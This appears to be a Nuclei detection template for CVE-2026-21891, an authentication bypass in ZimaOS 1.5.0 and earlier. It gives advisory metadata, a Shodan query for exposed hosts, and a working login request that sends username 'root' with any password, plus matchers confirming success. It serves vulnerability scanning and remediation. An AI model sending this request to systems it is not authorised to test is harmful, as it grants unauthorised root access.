id: CVE-2026-21891 info: name: ZimaOS - Authentication Bypass author: DhiyaneshDk severity: critical description: | ZimaOS <= 1.5.0 contains a broken authentication caused by improper password validation for known system service accounts in the login function, letting attackers authenticate with any password for these accounts, exploit requires knowledge of common usernames. impact: | Attackers can gain authenticated access to system service accounts without valid passwords, potentially compromising the system. remediation: | Update to a fixed version when available or apply patches to properly validate passwords for system service accounts. reference: - https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4 - https://nvd.nist.gov/vuln/detail/CVE-2026-21891 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L cvss-score: 9.4 cve-id: CVE-2026-21891 cwe-id: CWE-287 epss-score: 0.11368 epss-percentile: 0.93688 cpe: cpe:2.3:o:zimaspace:zimaos:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: html:"ZimaOS" product: zimaos vendor: zimaspace tags: cve,cve2026,zimaos,auth-bypass,broken-auth,vkev http: - raw: - | POST /v1/users/login HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* Content-Type: application/json Origin: {{RootURL}} Referer: {{RootURL}}/ { "username": "root", "password": "anything" } matchers-condition: and matchers: - type: word part: body words: - "success" - "username" - "created_at" condition: and - type: word part: content_type words: - "application/json" - type: status status: - 200 # digest: 4b0a00483046022100a01aab48e187bf00fb0296187d73576fcc84e4002c8822b125602027d60b225f0221008c81e65c4c32fe8b69ff82bd561c49edf10585e51248341bd1d54d73f90e55c5:922c64590222798bb761d5b6d8e72950